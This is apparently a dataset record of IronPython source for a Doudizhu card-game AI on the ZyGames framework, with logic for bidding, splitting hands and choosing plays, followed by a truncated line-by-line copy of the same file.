∞','乱世°妖娆','夏沫"Smile','七分笑三分真','沫尐诺⌒_⌒','___大苹果','德玛→西亚','Oo草丛伦oO','菊★花№信','_提莫必须死','嘉文四阿哥_','轮子┱妈','稻__草人','乌┣┰┝鸦','┣死歌┰┝','爱~。~射','炮-,-娘','oO小萝莉','狗头人Oo','大々‖嘴','大虫子','扇子Oo妈','冰鸟','船长','女剑','女枪','男枪','风女','卡萨丁','阿卡丽','卡特琳娜','伊泽瑞尔','戴安娜','安妮','凯特琳','贾克斯','卡萨丁','拉克丝','易大师','莫甘娜','奈德丽','索拉卡','提莫','潘森','泰达米尔','佛拉基米尔','崔斯塔娜','(=@__@=)哪里','丽桑桌','奎因','扎克','维嘉','墨菲特','索菲娅','阿狸','影流之主'], "head": ['head_1001','head_1002','head_1003','head_1004','head_1005','head_1006','head_1007','head_1008','head_1009','head_1010','head_1011','head_1012','head_1013','head_1014','head_1015','head_1016','head_1017','head_1018','head_1019','head_1020'] } class CardAILogic(): """斗地主AI逻辑""" def __init__(self, roomId, tableId, positionId): self.__table = None self.__pos = None self.__nextPos = None self.__prePos = None self.__playerNum = 3 self.__Landlord = None self.__CK = 13 self.__CA = 14 self.__C2 = 15#2子 self.__CW1 = 18 self.__CW2 = 19 self.__role = 0#处于地主的位置 self.__largestCardSize = self.__CW2 roomStruct = MemoryCacheStruct[RoomData]() key = str(roomId) roomData = None result = roomStruct.TryGet(key) if result[0]: roomData = result[1] resultTable = roomData.Tables.TryGetValue(tableId) if resultTable[0]: self.__table = resultTable[1] self.__playerNum = self.__table.PlayerNum if self.__table and positionId < self.__table.Positions.Length: tempCard = 0 for pos in self.__table.Positions: if pos.IsLandlord: self.__Landlord = pos if pos.Id == positionId: self.__pos = pos #计算最大牌 if pos.CardData and pos.CardData.Count > 0: lastCardVal = pos.CardData[pos.CardData.Count-1] % 100 if lastCardVal > tempCard: tempCard = lastCardVal if tempCard > 0: self.__largestCardSize = tempCard if self.__Landlord and self.__pos: index = (self.__pos.Id + 1) % self.__playerNum self.__nextPos = self.__table.Positions[index] preindex = (self.__pos.Id + self.__playerNum - 1) % self.__playerNum self.__prePos = self.__table.Positions[preindex] #计算role处在0:地主,-1:上家,1:下家位置 if self.__Landlord.Id == self.__pos.Id: self.__role = 0 elif self.__Landlord.Id == self.__nextPos.Id: self.__role = -1 else: self.__role = 1 def writeLog(self, msg): #todo test TraceLog.WriteComplement(msg) def getCardSize(self, card): """获取牌大小->int""" return card % 100 def getOutCardData(self): """出牌对象->CardData""" return self.__table.PreCardData def getOutCardResult(self): """获取已出牌记录->List<CardData>""" return self.__table.OutCardList def getUserCard(self): """获取玩家手上的牌->List<int>""" return self.__pos.CardData def getUserRole(self): """玩家角色,0:地主,-1:上家,1:下家位置""" return self.__role def getNextPosCardCount(self): """获取玩家下家牌数->int""" return self.__nextPos.CardData.Count def getPrePosCardCount(self): """获取玩家上家牌数->int""" return self.__prePos.CardData.Count def checkCall(self): """检查能否叫地主->bool""" #火箭为8分,炸弹为6分,大王4分,小王3分,一个2为2分 bigCardValue = 0#大牌权值 cards = self.getUserCard() times = self.__table.MultipleNum / 2 bomCards = [] bombvct = CardVector('bomb') self.getBombCard(cards, bombvct) bomCards.append(bombvct.getList()) wangvct = CardVector('wang') self.getWangBombCard(cards, wangvct) bomCards.append(wangvct.getList()) c2 = CardVector('c2') self.getCard(cards, self.__C2, c2) c2Count = len(c2.getList()) for bom in bomCards: if len(bom) == 4: bigCardValue = bigCardValue + 6 elif len(bom) == 2: bigCardValue = bigCardValue + 8 if len(bomCards) == 0: if wangvct.hasKey(self.__CW2): bigCardValue = bigCardValue + 4 if wangvct.hasKey(self.__CW1): bigCardValue = bigCardValue + 3 if c2Count < 4: bigCardValue = bigCardValue +(c2Count * 2) if(bigCardValue >= 7 and times < 3)\ or (bigCardValue >= 5 and times < 2)\ or (bigCardValue >= 2 and times < 1): return True return False def searchOutCard(self): """出牌搜索,牌组0:为空,1:单牌,2:对牌,3:王炸,4:三张,5:三带一,6:三带二,7:炸弹,8:顺子,9:四带二,10:连对,11:飞机,12:飞机带二,13:二连飞机带二对""" resultCards = [] handCard = self.getUserCard() if not handCard or len(handCard) == 0: return resultCards myCardCount = len(handCard) handleTimes = self.getCardHandleTimes(handCard) preOutCard = self.getOutCardData()#当前已的出牌 outCardResult = self.getOutCardResult() role = self.getUserRole() nextPosCardCount = self.getNextPosCardCount() prePosCardCount = self.getPrePosCardCount() nextIsLand = self.__nextPos.IsLandlord landlord = self.__Landlord landlordCardCount = self.__prePos.CardData.Count if not preOutCard or preOutCard.PosId == self.__pos.Id: #任意出牌 outVct = CardVector('') resultCards = self.freeOutCard(handCard) cardCount = len(resultCards) if (role==0 and (nextPosCardCount == 1 or prePosCardCount ==1) and cardCount==1)\ or (role!=0 and nextIsLand and nextPosCardCount == 1 and cardCount==1)\ or (role!=0 and landlord.CardData.Count == 1 and cardCount==1): #不能出比最大牌小的单牌 resultCards = [] self.getTwoCard(handCard, outVct) if outVct.len() > 0: self.copyList(outVct.getFirstVal(), resultCards) else: #最大单牌 cards = self.getLargeSingleCard(handCard, self.__CA) if len(cards) > 0: self.copyList(cards, resultCards) else: self.copyList(handCard[len(handCard)-1], resultCards) elif (role==0 and (nextPosCardCount == 2 or prePosCardCount ==2) and cardCount==2 and myCardCount > 2)\ or (role!=0 and nextIsLand and nextPosCardCount == 2 and cardCount==2 and myCardCount > 2)\ or (role!=0 and landlord.CardData.Count == 2 and cardCount==2 and myCardCount > 2): #不能出小于最大牌的对子 cardval = self.getCardSize(resultCards[0]) if cardval < self.__CA and cardval < self.__largestCardSize: resultCards = [] bombvct = CardVector('') lastCards = self.getBombCard(handCard, bombvct) if myCardCount < 6 and bombvct.len() > 0: self.copyList(bombvct.getFirstVal(), resultCards) self.getSingleCard(lastCards, outVct) if outVct.len() > 0: self.copyList(outVct.getFirstVal(), resultCards) else: resultCards.append(handCard[0]) elif role!=0 and nextIsLand==False and handleTimes > 3 and nextPosCardCount == 1: #自己手上大于6张,且同家剩1张时出单牌 resultCards = [] resultCards.append(handCard[0]) elif role!=0 and nextIsLand==False and handleTimes > 3 and nextPosCardCount == 2 and self.__pos.OutTwoTimes == 0: #自己手上大于6张,且同家剩2张配合对家出对次数为0时出对子 self.getTwoCard(handCard, outVct) if outVct.len() > 0: resultCards = [] self.__pos.OutTwoTimes = self.__pos.OutTwoTimes + 1 self.copyList(outVct.getFirstVal(), resultCards) else: pass #self.writeLog('%s:%s' % ('任意出牌' ,resultCards)) elif preOutCard.Type == 3: #王炸 return resultCards else: outcardType = preOutCard.Type islandlordOut = preOutCard.PosId == landlord.Id if role == 0: #地主压牌 if handleTimes < 3 or (nextPosCardCount == 2 and outcardType == DeckType.Double)\ or (nextPosCardCount == 1 and outcardType == DeckType.Single): #压牌 resultCards = self.enforceOutCard(preOutCard, handCard) elif nextPosCardCount < 7 or prePosCardCount < 7: #压牌不打炸 resultCards = self.enforceOutCard(preOutCard, handCard, True) else: #跟牌 resultCards = self.followOutCard(preOutCard, handCard) elif role < 0: #地主上家出牌 #a)当自己只差2手时压牌,或者地主小于3张且出对时压牌;或者地主小于6张并且打单或对且对家不是最大牌时压牌 #b)农民同家出牌大于等于A时不跟 if handleTimes < 3 or\ (landlordCardCount <= 2 and outcardType == DeckType.Double and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\ (landlordCardCount == 1 and outcardType == DeckType.Single and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\ landlordCardCount <= 2: #压牌 resultCards = self.enforceOutCard(preOutCard, handCard) elif (landlordCardCount < 7 and islandlordOut and (outcardType == DeckType.Double or outcardType == DeckType.Single) ): #压牌不打炸 resultCards = self.enforceOutCard(preOutCard, handCard, True) else: if (not islandlordOut) and (preOutCard.CardSize >= self.__CA \ or (outcardType >= DeckType.Double and preOutCard.CardSize >= self.__CK)\ or outcardType == DeckType.Single and preOutCard.CardSize > self.__C2): #不跟 return resultCards #跟牌 resultCards = self.followOutCard(preOutCard, handCard) else: #地主下家出牌,当地主小于3张 if handleTimes < 3 or (islandlordOut and landlordCardCount <= 2): #压牌 resultCards = self.enforceOutCard(preOutCard, handCard) elif (landlordCardCount <= 2 and outcardType == DeckType.Double and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\ (landlordCardCount == 1 and outcardType == DeckType.Single and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)): #压牌不打炸 resultCards = self.enforceOutCard(preOutCard, handCard, True) else: if (not islandlordOut) and (preOutCard.CardSize >= self.__CA \ or (outcardType >= DeckType.Double and preOutCard.CardSize >= self.__CK)\ or outcardType == DeckType.Single and preOutCard.CardSize > self.__C2): #不跟 return resultCards #跟牌 resultCards = self.followOutCard(preOutCard, handCard) return resultCards def copyList(self, list, clist, index=0, count=0): """@list: copy源,\n@clist: copy目标\@index:开始位置\n@count:数量""" if type(list) == types.ListType: i = 0 for val in list: if count > 0 and len(clist) == count: break if i >= index: clist.append(val) i = i+1 elif list: clist.append(list) def getLargeSingleCard(self, handCard, minval): """单牌倒打->[]""" result = [] #先打2 verctor = CardVector('') handTime = self.getCardHandleTimes(handCard) self.getCard(handCard, self.__C2, verctor) if handTime > 3 and verctor.len() > 0 and minval < self.__C2: result.append(verctor.getFirstVal()) else: verctor = CardVector('') wangvct = CardVector('') bombvct = CardVector('') #排除炸 lastCards = self.getBombCard(handCard, bombvct) lastCards = self.getWangBombCard(lastCards, wangvct) self.convertVerctor(lastCards, verctor) if verctor.len() > 0: tempCard = verctor.getMaxGreaterThan(minval) if tempCard: self.copyList(tempCard, result) return result #self.copyList(bombvct.getFirstVal(), result) #if len(result) == 0: # self.copyList(wangvct.getList(), result) return result def freeOutCard(self, handCard): """自由出牌,先飞机,连对,顺子,三张,对子,单牌->[]""" vector = self.splitCard(handCard) val = 0 resultCards = [] #判断剩余2手牌时是否是有炸或王炸 handTimes = self.getVectorHandleTimes(vector) if handTimes < 3: #王炸 resultCards = self.outWangBombCard(handCard) if len(resultCards) == 0: #取炸 resultCards = self.outBombCard(handCard) if len(resultCards) == 0: #先出最大的对或单 vectorMax = CardVector('Max') self.getCard(handCard, self.__largestCardSize, vectorMax) if vectorMax.len() > 0: if vector.get('two').hasKey(self.__largestCardSize): self.copyList(vector.get('two').get(self.__largestCardSize), resultCards) if len(resultCards) == 0 and vector.get('one').hasKey(self.__largestCardSize): self.copyList(vector.get('one').get(self.__largestCardSize), resultCards) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.FlyAndTwo, val, 8) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.FlyAndTwoDouble, val, 10) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.Fly, val, 6) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.Liandui, val, 6) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.Shunzi, val, 5) if len(resultCards) > 0: return resultCards #三张是A以上的牌时,先出其它类型牌 c2Cards = [] resultCards = self.processOutCard(vector, DeckType.ThreeAndOne, val, 3) if len(resultCards) > 0: if handTimes > 2 and self.getCardSize(resultCards[0]) >= self.__CA: c2Cards = resultCards resultCards = [] else: return resultCards if len(c2Cards) == 0: resultCards = self.processOutCard(vector, DeckType.ThreeAndTwo, val, 3) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.Three, val, 3) if len(resultCards) > 0: return resultCards resultCards = [] #只差一对 if len(handCard) == 2: resultCards = self.processOutCard(vector, DeckType.Double, val, 2) if len(resultCards) > 0: return resultCards #是否有四带2 bombCards = self.processOutCard(vector, DeckType.Bomb, val, 4) if handTimes < 5 and len(bombCards) > 0: resultCards = [] self.copyList(bombCards, resultCards) oneCount = self.getSingleCount(vector) twoCount = self.getTwoCount(vector) if oneCount > 1: self.copyList(vector.get('one').getIndexVal(0), resultCards) self.copyList(vector.get('one').getIndexVal(1), resultCards) return resultCards elif twoCount == 1 and oneCount ==1: onetemp = vector.get('one').getFirstVal() twotemp = vector.get('two').getFirstVal() if self.getCardSize(onetemp) > self.getCardSize(twotemp[0]): self.copyList(twotemp, resultCards) return resultCards else: self.copyList(onetemp, resultCards) self.copyList(twotemp[0], resultCards) return resultCards elif twoCount > 0: self.copyList(vector.get('two').getList(), resultCards) return resultCards else: resultCards = [] #是否出对或单 singleCards = self.processOutCard(vector, DeckType.Single, val, 1) twoCards = self.processOutCard(vector, DeckType.Double, val, 2) if len(twoCards) > 0 and len(singleCards) > 0\ and self.getCardSize(singleCards[0]) > self.getCardSize(twoCards[0]): return twoCards elif len(singleCards) > 0: return singleCards elif len(twoCards) > 0: return twoCards resultCards = self.processOutCard(vector, DeckType.Bomb, val, 4) if len(resultCards) > 0: return resultCards if len(c2Cards) == 0: resultCards = c2Cards return resultCards def followOutCard(self, preOutCard, handCard): """跟对方的出牌,不出对2或3张2->[]""" type = preOutCard.Type val = preOutCard.CardSize count = preOutCard.Cards.Length vector = self.splitCard(handCard) resultCards = self.processOutCard(vector, type, val, count, 0) if len(resultCards) > 1: if type != DeckType.Single\ and self.getCardSize(resultCards[0]) == self.__C2: resultCards = []#不出 return resultCards def processOutCard(self, vector, type, minval, mincount, maxcount=20): """处理牌组出牌规则->[]\n@vector:vector对象集合,@type:出牌类型,\n@minval:,\n@mincount:,\n@maxcount:为0时压牌,否则任意出""" resultCards = [] cards = [] if type == DeckType.Single: cards = self.getMoreThanCardVal(vector.get('one'), minval, mincount) if len(cards) > 0: resultCards.append(cards[0]) elif type == DeckType.Double: cards = self.getMoreThanCardVal(vector.get('two'), minval, mincount/2) if len(cards) > 0: self.copyList(cards, resultCards) elif type == DeckType.WangBomb: return resultCards elif type == DeckType.Three: cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3) if len(cards) > 0: self.copyList(cards, resultCards) elif type == DeckType.ThreeAndOne: cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3) onevct = vector.get('one') if len(cards) > 0 and onevct.len() > 0: self.copyList(cards, resultCards) resultCards.append(onevct.getFirstVal()) elif type == DeckType.ThreeAndTwo: cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3) twovct = vector.get('two') if len(cards) > 0 and twovct.len() > 0: self.copyList(cards, resultCards) self.copyList(twovct.getFirstVal(), resultCards) elif type == DeckType.Bomb: cards = self.getMoreThanCardVal(vector.get('bomb'), minval, mincount/4) if len(cards) > 0: self.copyList(cards, resultCards) elif type == DeckType.Shunzi: shunvct = vector.get('shun') keys = shunvct.getKeys() for key in keys: cards = shunvct.get(key) resultCards = self.getMoreThanShunCard(cards, minval, mincount, maxcount) if len(resultCards) > 0: break elif type == DeckType.FourAndTwo: cards = self.getMoreThanCardVal(vector.get('bomb'), minval, mincount/4) onevct = vector.get('one') twovct = vector.get('two') if len(cards) > 0 and (onevct.len() > 1 or twovct.len() > 0): self.copyList(cards, resultCards) if onevct.len() > 1: self.copyList(onevct.getIndexVal(0), resultCards) self.copyList(onevct.getIndexVal(1), resultCards) else: for i in range(0,2): self.copyList(twovct.getIndexVal(i), resultCards) elif type == DeckType.Liandui: twovct = vector.get('two') resultCards = self.getMoreThanCardVal(twovct, minval, mincount/2, maxcount) elif type == DeckType.Fly\ or type == DeckType.FlyAndTwo\ or type == DeckType.FlyAndTwoDouble: #处理飞机 threevct = vector.get('three') if threevct.len() > 1: mcount = 0 attrVector = None if type == DeckType.FlyAndTwo: attrVector = vector.get('one') mcount = mincount / (3+1) elif type == DeckType.FlyAndTwoDouble: attrVector = vector.get('two') mcount = mincount / (3+2) else: mcount = mincount / 3 if mcount > 1: threeCards = self.getMoreThanCardVal(threevct, minval, mcount, maxcount) if len(threeCards) > 0 and attrVector and attrVector.len() >= mcount: attrcount = 0 tempArr = [] attrkeys = attrVector.getKeys() for key in attrkeys: if attrcount == mcount: break self.copyList(attrVector.get(key),tempArr) attrcount = attrcount + 1 if (maxcount==0 and attrcount == mcount) or ((maxcount>0 and attrcount >= mcount)): self.copyList(threeCards, resultCards) self.copyList(tempArr, resultCards) else: pass return resultCards def enforceOutCard(self, preOutCard, handCard, ignoreBomb=False): """压对方的牌->list\n@ignoreBomb:是否排除炸""" resultCards = [] type = preOutCard.Type minval = preOutCard.CardSize cardCount = preOutCard.Cards.Length return self.processEnforceOutCard(handCard, type, minval, cardCount, ignoreBomb) def processEnforceOutCard(self, handCard, type, minval, cardCount, ignoreBomb): """处理压对方的牌->list""" resultCards = [] vector = CardVector('') #判断剩余牌是否是炸或王炸 handTimes = self.getCardHandleTimes(handCard) if handTimes < 3: #取炸 resultCards = self.outBombCard(handCard) if len(resultCards) == 0: #王炸 resultCards = self.outWangBombCard(handCard) if len(resultCards) > 0: return resultCards if type == DeckType.Single: #最大单牌 self.copyList(self.getLargeSingleCard(handCard, minval),resultCards) elif type == DeckType.Double: self.getTwoCard(handCard, vector) if vector.len()>0: self.copyList(vector.getGreaterThan(minval),resultCards) else: self.getTwoCard(handCard, vector, True) if vector.len()>0: self.copyList(vector.getGreaterThan(minval),resultCards) elif type == DeckType.WangBomb: return resultCards elif type == DeckType.Three: self.getThreeCard(handCard, vector) if vector.len()>0: self.copyList(vector.getGreaterThan(minval),resultCards) elif type == DeckType.ThreeAndOne: lessCards = self.getThreeCard(handCard, vector) if vector.len()>0: vct = CardVector('') self.getSingleCard(lessCards, vct) threearr = vector.getGreaterThan(minval) if vct.len() > 0 and threearr and len(threearr) > 0: self.copyList(threearr, resultCards) resultCards.append(vct.getFirstVal()) elif type == DeckType.ThreeAndTwo: lessCards = self.getThreeCard(handCard, vector) if vector.len()>0: vct = CardVector('') self.getTwoCard(lessCards, vct) threearr = vector.getGreaterThan(minval) if vct.len() > 0 and threearr and len(threearr) > 0: self.copyList(threearr,resultCards) self.copyList(vct.getFirstVal(),resultCards) elif type == DeckType.Bomb: pass elif type == DeckType.Shunzi: lessCards = self.getShunCard(handCard, vector) if vector.len()>0: resultCards = self.getMoreThanShunCard(vector.getFirstVal(), minval, cardCount) elif type == DeckType.FourAndTwo: lessCards = self.getBombCard(handCard, vector) tempcard = vector.getGreaterThan(minval) if tempcard: onevct = CardVector('') twovct = CardVector('') lessCards = self.getSingleCard(lessCards, onevct) lessCards = self.getTwoCard(lessCards, twovct) if (onevct.len() > 1 or twovct.len() > 0): self.copyList(tempcard, resultCards) if onevct.len() > 1: self.copyList(onevct.getIndexVal(0), resultCards) self.copyList(onevct.getIndexVal(1), resultCards) else: for i in range(0,2): self.copyList(twovct.getIndexVal(i), resultCards) elif type == DeckType.Liandui: self.getTwoCard(handCard, vector) cnum = cardCount / 2 if vector.len() >= cnum: resultCards = self.getMoreThanCardVal(vector, minval, cnum) pass elif type == DeckType.Fly\ or type == DeckType.FlyAndTwo\ or type == DeckType.FlyAndTwoDouble: #处理飞机 lessCards = self.getThreeCard(handCard, vector) threevct = vector if threevct.len() > 1: mcount = 0 attrVector = None if type == DeckType.FlyAndTwo: attrVector = CardVector('') self.getSingleCard(lessCards, attrVector) mcount = mincount / (3+1) elif type == DeckType.FlyAndTwoDouble: attrVector = CardVector('') self.getTwoCard(lessCards, attrVector) mcount = mincount / (3+2) else: mcount = mincount / 3 if mcount > 1: threeCards = self.getMoreThanCardVal(threevct, minval, mcount, maxcount) if len(threeCards) > 0 and attrVector and attrVector.len() >= mcount: attrcount = 0 tempArr = [] attrkeys = attrVector.getKeys() for key in attrkeys: if attrcount == mcount: break self.copyList(attrVector.get(key),tempArr) attrcount = attrcount + 1 if (maxcount==0 and attrcount == mcount) or ((maxcount>0 and attrcount >= mcount)): self.copyList(threeCards, resultCards) self.copyList(tempArr, resultCards) else: pass if ignoreBomb: if len(resultCards) == 0: #取炸 resultCards = self.outBombCard(handCard) if len(resultCards) == 0: #王炸 resultCards = self.outWangBombCard(handCard) return resultCards def outBombCard(self, handCard): bombvct = CardVector('bomb') self.getBombCard(handCard, bombvct) if bombvct.len() > 0: return bombvct.getFirstVal() return [] def outWangBombCard(self, handCard): wangvct = CardVector('wang') self.getWangBombCard(handCard, wangvct) if wangvct.len() == 2: return wangvct.getList() return [] #以下是拆牌算法 def splitCard(self, handCard): """拆牌->CardVector""" vector = CardVector('all') vector.addChild(CardVector('wang')) vector.addChild(CardVector('bomb')) vector.addChild(CardVector('shun')) vector.addChild(CardVector('three')) vector.addChild(CardVector('two')) vector.addChild(CardVector('one')) lastCards = [] if len(handCard) == 2: if handCard[0] == self.__CW1 and handCard[1] == self.__CW2: vector.get('wang').add(val, handCard[0]) vector.get('wang').add(val, handCard[1]) if len(handCard) > 1: lastCards = self.getUnrelatedCard(handCard, vector) #剩余关联牌 lastCards = self.getBombCard(lastCards, vector.get('bomb')) #检查飞机 lastCards = self.getFlyCard(lastCards, vector.get('three')) lastCards = self.getShunTwoCard(lastCards, vector.get('two')) lastCards = self.getShunCard(lastCards, vector.get('shun')) lastCards = self.getThreeCard(lastCards, vector.get('three')) lastCards = self.getTwoCard(lastCards, vector.get('two')) lastCards = self.checkSingleAsShun(lastCards, vector.get('shun')) else: lastCards = handCard lastCards = self.getSingleCard(lastCards, vector.get('one')) return vector def addVector(self, vector, val, list): """增加到vector集合以wang,bomb,three,two,one分类->void""" l = len(list) if l > 0 and val >= self.__CW1: vector.get('wang').add(val, list[0]) elif l == 4: vector.get('bomb').add(val, list) elif l == 3: vector.get('three').add(val, list) elif l == 2: vector.get('two').add(val, list) elif l == 1: vector.get('one').add(val, list[0]) def getUnrelatedCard(self, handCard, vector): """取出无关联的牌,返回剩余关联牌\n@vector:是wang,bomb,shun等的集合->[]""" arr = [] lastCards = [] eqVal = 0 count = len(handCard) if count < 2: return handCard for i in range(0, count): card = handCard[i] val = self.getCardSize(card) if i == 0: arr.append(card) continue precard = handCard[i-1] preval = self.getCardSize(precard) if val == preval: arr.append(card) else: #之间是否有联系 if preval >= self.__C2 or ((eqVal==0 or eqVal != preval-1) and (val==self.__C2 or preval < val-1)): self.addVector(vector, preval, arr) else: self.copyList(arr, lastCards) arr=[] eqVal = preval arr.append(card) #结尾 if i == count-1: if val >= self.__C2 or eqVal < val-1: if (val == self.__CW1 or (preval < self.__CW1 and val == self.__CW2)): #单张大小王 vector.get('one').add(val, card) else: self.addVector(vector, val, arr) else: self.copyList(arr, lastCards) return lastCards #以下是取牌组逻辑 def getShunCard(self, handCard, vector): """取出顺子,返回剩余牌->[]""" lastCards = [] count = len(handCard) if count < 2: return handCard arr = [] arrignore = [] arrlog = [] for i in range(0, count): card = handCard[i] if i == 0: arr.append(card) arrlog.append(card) continue precard = handCard[i-1] preval = self.getCardSize(precard) val = self.getCardSize(card) if preval == val-1 and val < self.__C2: arr.append(card) arrlog.append(card) elif preval == val: arrignore.append(card) arrlog.append(card) else: if len(arr) >= 5: vector.add(self.getCardSize(arr[0]), arr) self.copyList(arrignore, lastCards) else: self.copyList(arrlog, lastCards) arr = [] arr.append(card) arrlog = [] arrlog.append(card) arrignore = [] if i == count-1: if len(arr) >= 5: vector.add(self.getCardSize(arr[0]), arr) self.copyList(arrignore, lastCards) arrignore = [] else: self.copyList(arrlog, lastCards) return lastCards def getMoreThanShunCard(self, cards, minval, mincount, maxcount=0): """从顺子cards对象中获取顺子大于minval的牌->[]\n@cards:手上的牌,\n@minval:最小牌面,\n@mincount:顺子个数,\n@maxcount:0时固定匹配""" result = [] length = len(result) for card in cards: val = self.getCardSize(card) if val > minval and val < self.__C2\ and ((maxcount==0 and length < mincount)\ or(maxcount > 0 and length < maxcount-1)): result.append(card) if (maxcount == 0 and len(result) == mincount)\ or(maxcount > 0 and len(result) >= mincount) : return result return [] def getWangBombCard(self, handCard, vector): """取出王炸牌至vector对象,返回剩余牌->[]""" arr = [] temp = [] count = len(handCard) for i in range(0, count): card = handCard[i] val = self.getCardSize(card) if val == self.__CW1 or val == self.__CW2: temp.append(card) else: arr.append(card) if len(temp) == 2: for card in temp: vector.add(self.getCardSize(card), card) else: self.copyList(temp, arr) return arr def getBombCard(self, handCard, vector): """取出炸至vector对象,返回剩余牌->[]""" return self.getSameCard(handCard, 4, vector) def getFlyCard(self, handCard, vector): """取出飞机至vector对象,返回剩余牌->[]""" if len(handCard) > 5: threevct = CardVector('') self.getThreeCard(handCard, threevct) if threevct.len() > 1: arr = self.getMoreThanCardVal(threevct, 0, 2, 20) self.getSameCard(arr, 3, vector) for card in arr: handCard.remove(card) return handCard; def getShunTwoCard(self, handCard, vector): """取出大于3连对至vector对象,返回剩余牌->[]""" if len(handCard) > 6: twovct = CardVector('') self.getTwoCard(handCard, twovct) if twovct.len() > 3: arr = self.getMoreThanCardVal(twovct, 0, 4, 20) self.getSameCard(arr, 2, vector) for card in arr: handCard.remove(card) return handCard; def getThreeCard(self, handCard, vector): """取出3条至vector对象,返回剩余牌->[]""" return self.getSameCard(handCard, 3, vector) def getTwoCard(self, handCard, vector, matchThree=False): """取出对子至vector对象,返回剩余牌->[]\n@matchThree:是否匹配三张""" lastCards = self.getSameCard(handCard, 2, vector) if matchThree: threevct = CardVector('') lastCards = self.getSameCard(handCard, 3, threevct) if threevct.len() > 0: keys = threevct.getKeys() for key in keys: val = threevct.get(key) arr = [] self.copyList(val, arr, 0, 2) vector.add(key, arr) return lastCards def getMoreThanCardVal(self, vector, minval, mincount, maxcount=0): """从vector对象取出大于minval的连续牌列表->[]\n@vector:vector对象,\n@minval:牌面值,\n@mincount:匹配个数,\n@maxcount:0时固定匹配""" arr = [] resultCards = [] keys = vector.getKeys() for i in range(0, len(keys)): key = keys[i] if i == 0 and key > minval and key < self.__C2: arr.append(key) elif key > minval: prekey = keys[i-1] if prekey == key-1 and key < self.__C2: arr.append(key) if maxcount==0 and len(arr) == mincount: break else: if len(arr) >= mincount: break else: arr = [] arr.append(key) length = len(arr) if length >= mincount: for i in range(0, length): if (maxcount==0 and i == mincount) or (maxcount > 0 and i >= maxcount-1): break val = arr[i] self.copyList(vector.get(val), resultCards) return resultCards def checkSingleAsShun(self, handCard, vector): """检查单牌是否可加到顺子中,返回剩余牌->[]""" shunvct = vector keys = shunvct.getKeys() if len(keys) == 0: return handCard; lastCards = [] for card in handCard: suc = False for key in keys: items = shunvct.get(key) if len(items) == 0: continue min = self.getCardSize(items[0]) max = self.getCardSize(items[len(items)-1]) val = self.getCardSize(card) if val == min-1: items.insert(0, val) suc = True break elif val == max+1: items.append(val) suc = True break if not suc: lastCards.append(card) return lastCards def convertVerctor(self, handCard, vector): """将牌转至vector对象->void""" for card in handCard: vector.add(self.getCardSize(card), card) def getSingleCard(self, handCard, vector): """取出单牌至vector对象,返回剩余牌->[]""" return self.getSameCard(handCard, 1, vector) def getSameCard(self, handCard, num, vector): """取相同的牌,返回剩余牌\n@num:相同的个数->[]""" lastCards = [] arr = [] count = len(handCard) if count < 2: if count > 0 and num == 1: card = handCard[0] vector.add(self.getCardSize(card), card) return arr; else: return handCard for i in range(0, count): card = handCard[i] if i == 0: arr.append(card) continue precard = handCard[i-1] val = self.getCardSize(card) preval = self.getCardSize(precard) if val == preval: arr.append(card) else: if len(arr) == num: if num == 1: vector.add(preval, arr[0]) else: vector.add(preval, arr) else: self.copyList(arr, lastCards) arr = [] arr.append(card) if count-1 == i: if len(arr) == num: if num == 1: vector.add(val, arr[0]) else: vector.add(val, arr) else: self.copyList(arr, lastCards) return lastCards def getCard(self, handCard, cardVal, vector): """取出指定大小的牌至vector对象,返回剩余牌->[]\n@cardId:搜索指定牌大小""" arr = [] count = len(handCard) for i in range(0, count): card = handCard[i] val = self.getCardSize(card) if val == cardVal: vector.add(val, card) else: arr.append(card) return arr def getCardHandleTimes(self, handCard): """计算出牌手数->int""" vector = self.splitCard(handCard) return self.getVectorHandleTimes(vector) def getVectorHandleTimes(self, vector): """计算出牌手数->int\n@vector:拆牌后的vector对象""" times = 0 if vector.get('wang').len() > 0: times = times + 1 bombLen = vector.get('bomb').len() if bombLen > 0: times = times + bombLen #四带2 times = times + vector.get('shun').len() threeLen = vector.get('three').len() if threeLen > 0: times = times + threeLen twoLen = vector.get('two').len() if twoLen > 0: times = times + twoLen oneLen = vector.get('one').len() if oneLen > 0: times = times + oneLen times = times - threeLen * 1 return times def getSingleCount(self, vector): """计算单牌数->int""" return vector.get('one').len() def getTwoCount(self, vector): """计算对牌数->int""" return vector.get('two').len()
[ "import clr, sys, types\r\n", "clr.AddReference('System')\r\n", "clr.AddReference('ZyGames.Framework.Common');\r\n", "clr.AddReference('ZyGames.Framework')\r\n", "clr.AddReference('ZyGames.Framework.Game')\r\n", "clr.AddReference('ZyGames.Doudizhu.Model')\r\n", "from ZyGames.Framework.Common.Log import *\r\n", "from System.Collections.Generic import *\r\n", "from ZyGames.Doudizhu.Model import *\r\n", "from ZyGames.Framework.Cache.Generic import *\r\n", "from ZyGames.Framework.Game.Cache import *\r\n", "\r\n", "class CardVector():\r\n", " \"\"\"牌储存结构,ex:2:[202,102],3:[203,103]\"\"\"\r\n", " def __init__(self, type):\r\n", " \"\"\"@type:结构类型wang,bomb,shun,three,two,one\"\"\"\r\n", " self.__type = type\r\n", " self.__data = {}\r\n", "\r\n", " def addChild(self, vector):\r\n", " key = vector.__type\r\n", " if key:\r\n", " self.__data[key] = vector\r\n", "\r\n", " def len(self):\r\n", " return len(self.__data.keys())\r\n", "\r\n", " def add(self, key, cards):\r\n", " self.__data[key] = cards\r\n", " \r\n", " def hasKey(self, key):\r\n", " return self.__data.has_key(key)\r\n", "\r\n", " def get(self, key):\r\n", " return self.__data[key]\r\n", "\r\n", " def remove(self, key):\r\n", " del self.__data[key]\r\n", "\r\n", " def clear(self):\r\n", " return self.__data.clear()\r\n", " \r\n", " def getItems(self):\r\n", " return self.__data.items()\r\n", "\r\n", " def getKeys(self):\r\n", " 